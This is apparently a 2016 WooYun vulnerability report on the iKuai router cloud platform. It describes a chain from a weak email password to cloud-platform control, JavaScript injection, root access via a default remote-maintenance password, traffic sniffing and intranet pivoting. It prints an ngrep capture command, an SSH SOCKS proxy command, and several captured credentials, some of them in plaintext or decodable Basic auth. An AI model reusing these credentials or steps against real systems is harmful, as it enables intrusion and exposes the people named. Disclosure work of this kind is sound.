当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207907

漏洞标题:WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网(官方演示)

相关厂商:爱快免费流控路由

漏洞作者: 北京方便面

提交时间:2016-05-12 17:20

修复时间:2016-06-27 10:20

公开时间:2016-06-27 10:20

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-12: 细节已通知厂商并且等待厂商处理中
2016-05-13: 厂商已经确认,细节仅向厂商公开
2016-05-23: 细节向核心白帽子及相关领域专家公开
2016-06-02: 细节向普通白帽子公开
2016-06-12: 细节向实习白帽子公开
2016-06-27: 细节向公众公开

简要描述:

WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网(官方演示)

详细说明:

mask 区域 
*****om  ik*****


源于一个邮箱弱口令
其他弱口令:

mask 区域 
*****.com ik*****


屏幕快照 2016-05-12 下午4.20.55.png


屏幕快照 2016-05-12 下午4.16.53.png


mask 区域 
*****云平^*****
*****kuai8*****
*****45*****


屏幕快照 2016-05-12 下午4.24.00.png


mask 区域 
*****^躺^*****
*****20.132*****
*****^ro*****
*****ai201*****

漏洞证明:

控制了云端能做哪些呢?
插js看一下效果

屏幕快照 2016-05-12 下午5.13.28.png


屏幕快照 2016-05-12 下午5.14.12.png


屏幕快照 2016-05-12 下午5.15.08.png


屏幕快照 2016-05-11 下午4.33.34.png


屏幕快照 2016-05-12 下午4.26.50.png


测试过程中又发现一个问题
路由器中有一个远程维护功能,只要开启,默认密码就是www.ikuai8.com
但账号未知
后通过邮件分析发现账号应该是sshd(通用问题)

屏幕快照 2016-05-12 下午4.31.07.png


root权限控制官方路由,可以使用ngrep进行抓包
所有http请求一览无余,不止有cookie

ngrep -q -W byline -d lan1 "^(GET|POST|HTTP) .*"


屏幕快照 2016-05-12 下午2.00.33.png


T 192.168.1.188:54272 -> 115.29.185.206:80 [AP]
GET /public?action=system.getSysTime&data={} HTTP/1.1.
Host: cc.7moor.com.
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0.
Accept: */*.
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3.
Accept-Encoding: gzip, deflate.
DNT: 1.
X-Requested-With: XMLHttpRequest.
Referer: http://cc.7moor.com/.
Cookie: loginName=8**0*******; extenType=gateway; rememberBusyType=true; password=xw*******04; remember=true; logoutCheck=true; Hm_lvt_b88c6366e7fa016f4ada0c3bc6c694d2=1458625721,1459391683,1459501612; BDTUJIAID=c1449a486b9ea8407f476361853d9e75; session=2a7de870-8c13-11e5-a964-4541194ad61a.
Connection: keep-alive.


mask 区域 
1.http://**.**.**/  账号:8000@Ikuai 密码:xwq19910304


屏幕快照 2016-05-12 下午1.54.21.png


T 192.168.1.252:52225 -> 220.249.243.199:80 [AP]
POST /Microsoft-Server-ActiveSync?User=lxliu&DeviceId=6DDC1702BF011AC165EF7C9EC0AD1D82&DeviceType=Foxmail&Cmd=Sync HTTP/1.0.
Accept: text/html, */*.
User-Agent: MSFT-PPC/5.2.1400.
Content-Length: 77.
Host: ex.qq.com.
Connection: keep-alive.
Content-Type: application/vnd.ms-sync.wbxml.
MS-ASProtocolVersion: 12.0.
Authorization: Basic bHhsaXVAaWt1YWk4LmNvbTppS3VhaTg=.


邮箱账号密码

mask 区域 
*****8.com:*****


屏幕快照 2016-05-12 下午5.19.44.png


邮箱内发现官方路由密码:

mask 区域 
*****ZiBi*****


屏幕快照 2016-05-12 下午4.40.16.png


T 192.168.0.240:26452 -> 118.184.176.13:80 [AP]
GET /dyndns/update?system=dyndns&hostname=hlcui.in.3322.org&myip=66.0.0.249 HTTP/1.1.
User-Agent: Wget/1.13.4 (linux-gnu).
Accept: */*.
Authorization: Basic 


mask 区域


*****3LmlrdWF*****






.
Host: members.3322.org.
Connection: Keep-Alive.


http://www.pubyun.com/user/
hlcui123:www.ikuai8.com
另外发现了内网禅道系统
http://192.168.1.88/
可以通过ssh代理的方式访问
ssh -qTfnN -D 7878

mask 区域 
*****253.1*****


屏幕快照 2016-05-12 下午4.44.28.png


内网的多个路由沦陷

屏幕快照 2016-05-12 下午4.50.15.png


屏幕快照 2016-05-12 下午4.51.32.png

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-13 10:18

厂商回复:

一个简单的问题,或者说是疏忽的问题,会波及很大的漏洞,这个之前真是没有想到,创业三年来乌云和白帽子对我们帮助实在是太大了,不但帮从专业角度帮助我们发现了很多漏洞和隐患,也从事实的角度教育了我们的同事们提升安全意识,我们团队对乌云和白帽子深深的鞠躬,表示我们由衷的感谢,本次的漏洞的发现让我们对一些平时看起来不显眼的地方更加关注,感谢乌云,感谢白帽子

最新状态:

暂无